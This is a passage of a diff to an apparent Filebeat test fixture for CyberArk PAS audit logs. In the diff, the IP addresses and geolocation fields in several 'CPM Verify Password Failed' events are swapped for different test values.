         "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:19:58Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Verify Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:19:58</Timestamp>\n    <IsoTimestamp>2021-03-15T13:19:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814397\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:19:58</Timestamp>\n    <IsoTimestamp>2021-03-15T13:19:58Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;username=ELASTIC\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814397\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 06:19:58",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.user.name": "ELASTIC\\bart",
         "event.action": "cpm verify password failed",
         "event.category": [
@@ -47,13 +48,13 @@
         "event.kind": "event",
         "event.module": "cyberarkpas",
         "event.outcome": "failure",
-        "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "event.severity": 7,
         "event.timezone": "-02:00",
         "event.type": [
             "error"
         ],
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
@@ -66,7 +67,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC\\bart",
@@ -85,42 +86,43 @@
     {
         "@timestamp": "2021-03-15T13:25:32.000Z",
         "cyberarkpas.audit.action": "CPM Verify Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
-        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). ",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
+        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). ",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615814709",
         "cyberarkpas.audit.ca_properties.last_task": "VerifyTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask",
         "cyberarkpas.audit.ca_properties.retries_count": "0",
         "cyberarkpas.audit.ca_properties.user_dn": "ELASTIC.local",
         "cyberarkpas.audit.ca_properties.user_name": "bart",
         "cyberarkpas.audit.desc": "CPM Verify Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.username": "bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:25:32Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Verify Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:25:32</Timestamp>\n    <IsoTimestamp>2021-03-15T13:25:32Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;username=bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814709\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"UserDN\" Value=\"ELASTIC.local\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:25:32</Timestamp>\n    <IsoTimestamp>2021-03-15T13:25:32Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;username=bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615814709\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"UserDN\" Value=\"ELASTIC.local\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-67.43.156.12-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). \n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 06:25:32",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.user.name": "bart",
         "event.action": "cpm verify password failed",
         "event.category": [
@@ -131,17 +133,17 @@
         "event.kind": "event",
         "event.module": "cyberarkpas",
         "event.outcome": "failure",
-        "event.reason": "Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). ",
+        "event.reason": "Error in verifypass to user 81.2.69.143\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The network name cannot be found. (winRc=67). ",
         "event.severity": 7,
         "event.timezone": "-02:00",
         "event.type": [
             "error"
         ],
-        "file.path": "Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-67.43.156.12-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 4191,
+        "log.offset": 4151,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -150,7 +152,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "PasswordManager",
@@ -169,41 +171,42 @@
     {
         "@timestamp": "2021-03-15T13:33:26.000Z",
         "cyberarkpas.audit.action": "CPM Verify Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
-        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
+        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615815206",
         "cyberarkpas.audit.ca_properties.last_task": "VerifyTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask",
         "cyberarkpas.audit.ca_properties.retries_count": "0",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart",
         "cyberarkpas.audit.desc": "CPM Verify Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
+        "cyberarkpas.audit.extra_details.other.address": "81.2.69.143",
         "cyberarkpas.audit.extra_details.username": "ELASTIC.local\\bart",
-        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "cyberarkpas.audit.file": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "cyberarkpas.audit.iso_timestamp": "2021-03-15T13:33:26Z",
         "cyberarkpas.audit.issuer": "PasswordManager",
         "cyberarkpas.audit.message": "CPM Verify Password Failed",
-        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:33:26</Timestamp>\n    <IsoTimestamp>2021-03-15T13:33:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=34.66.114.180;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615815206\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"34.66.114.180\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
-        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-34.66.114.180-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n",
+        "cyberarkpas.audit.raw": "<syslog>\n\n  <audit_record>\n    <Rfc5424>yes</Rfc5424>\n    <Timestamp>Mar 15 06:33:26</Timestamp>\n    <IsoTimestamp>2021-03-15T13:33:26Z</IsoTimestamp>\n    <Hostname>VAULT</Hostname>\n    <Vendor>Cyber-Ark</Vendor>\n    <Product>Vault</Product>\n    <Version>11.7.0000</Version>\n    <MessageID>38</MessageID>\n    <Desc>CPM Verify Password Failed</Desc>\n    <Severity>Error</Severity>\n    <Issuer>PasswordManager</Issuer>\n    <Action>CPM Verify Password Failed</Action>\n    <SourceUser></SourceUser>\n    <TargetUser></TargetUser>\n    <Safe>partner</Safe>\n    <File>Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart</File>\n    <Station>10.0.1.20</Station>\n    <Location></Location>\n    <Category></Category>\n    <RequestId></RequestId>\n    <Reason>ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n</Reason>\n    <ExtraDetails>address=81.2.69.143;username=ELASTIC.local\\bart;</ExtraDetails>\n    <Message>CPM Verify Password Failed</Message>\n    <GatewayStation></GatewayStation>\n    <CAProperties>\n      <CAProperty Name=\"PolicyID\" Value=\"WinDomain\"></CAProperty>\n      <CAProperty Name=\"UserName\" Value=\"ELASTIC.local\\bart\"></CAProperty>\n      <CAProperty Name=\"Address\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"ResetImmediately\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"CPMStatus\" Value=\"failure\"></CAProperty>\n      <CAProperty Name=\"RetriesCount\" Value=\"0\"></CAProperty>\n      <CAProperty Name=\"LastFailDate\" Value=\"1615815206\"></CAProperty>\n      <CAProperty Name=\"LastTask\" Value=\"VerifyTask\"></CAProperty>\n      <CAProperty Name=\"LogonDomain\" Value=\"81.2.69.143\"></CAProperty>\n      <CAProperty Name=\"CPMErrorDetails\" Value=\"Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \"></CAProperty>\n      <CAProperty Name=\"CreationMethod\" Value=\"PVWA\"></CAProperty>\n      <CAProperty Name=\"DeviceType\" Value=\"Operating System\"></CAProperty>\n    </CAProperties>\n  </audit_record>\n\n</syslog>",
+        "cyberarkpas.audit.reason": "ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-81.2.69.143-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). \n",
         "cyberarkpas.audit.rfc5424": true,
         "cyberarkpas.audit.safe": "partner",
         "cyberarkpas.audit.severity": "Error",
         "cyberarkpas.audit.station": "10.0.1.20",
         "cyberarkpas.audit.timestamp": "Mar 15 06:33:26",
-        "destination.address": "34.66.114.180",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 38.6583,
-        "destination.geo.location.lon": -77.2481,
-        "destination.geo.region_iso_code": "US-VA",
-        "destination.geo.region_name": "Virginia",
-        "destination.ip": "34.66.114.180",
+        "destination.address": "81.2.69.143",
+        "destination.geo.city_name": "London",
+        "destination.geo.continent_name": "Europe",
+        "destination.geo.country_iso_code": "GB",
+        "destination.geo.country_name": "United Kingdom",
+        "destination.geo.location.lat": 51.5142,
+        "destination.geo.location.lon": -0.0931,
+        "destination.geo.region_iso_code": "GB-ENG",
+        "destination.geo.region_name": "England",
+        "destination.ip": "81.2.69.143",
         "destination.user.name": "ELASTIC.local\\bart",
         "event.action": "cpm verify password failed",
         "event.category": [
@@ -214,17 +217,17 @@
         "event.kind": "event",
         "event.module": "cyberarkpas",
         "event.outcome": "failure",
-        "event.reason": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "event.reason": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "event.severity": 7,
         "event.timezone": "-02:00",
         "event.type": [
             "error"
         ],
-        "file.path": "Root\\Operating System-WinDomain-34.66.114.180-ELASTICbart",
+        "file.path": "Root\\Operating System-WinDomain-81.2.69.143-ELASTICbart",
         "fileset.name": "audit",
         "host.name": "VAULT",
         "input.type": "log",
-        "log.offset": 8413,
+        "log.offset": 8333,
         "log.syslog.priority": "7",
         "network.direction": "outbound",
         "observer.hostname": "VAULT",
@@ -233,7 +236,7 @@
         "observer.version": "11.7.0000",
         "related.ip": [
             "10.0.1.20",
-            "34.66.114.180"
+            "81.2.69.143"
         ],
         "related.user": [
             "ELASTIC.local\\bart",
@@ -252,42 +255,43 @@
     {
         "@timestamp": "2021-03-15T15:04:11.000Z",
         "cyberarkpas.audit.action": "CPM Verify Password Failed",
-        "cyberarkpas.audit.ca_properties.address": "34.66.114.180",
-        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 34.66.114.180\\ELASTIC.local\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). ",
+        "cyberarkpas.audit.ca_properties.address": "81.2.69.143",
+        "cyberarkpas.audit.ca_properties.cpm_error_details": "Error in verifypass to user 81.2.69.143\\ELASTIC.local\\bart on domain 81.2.69.143(\\\\81.2.69.143). Reason: The specified username is invalid. (winRc=2202). ",
         "cyberarkpas.audit.ca_properties.cpm_status": "failure",
         "cyberarkpas.audit.ca_properties.creation_method": "PVWA",
         "cyberarkpas.audit.ca_properties.device_type": "Operating System",
         "cyberarkpas.audit.ca_properties.last_fail_date": "1615820651",
         "cyberarkpas.audit.ca_properties.last_task": "VerifyTask",
-        "cyberarkpas.audit.ca_properties.logon_domain": "34.66.114.180",
+        "cyberarkpas.audit.ca_properties.logon_domain": "81.2.69.143",
         "cyberarkpas.audit.ca_properties.policy_id": "WinDomain",
         "cyberarkpas.audit.ca_properties.reset_immediately": "VerifyTask",
         "cyberarkpas.audit.ca_properties.retries_count": "1",
         "cyberarkpas.audit.ca_properties.user_name": "ELASTIC.local\\bart",
         "cyberarkpas.audit.desc": "CPM Verify Password Failed",
-        "cyberarkpas.audit.extra_details.other.address": "34.66.114.180",
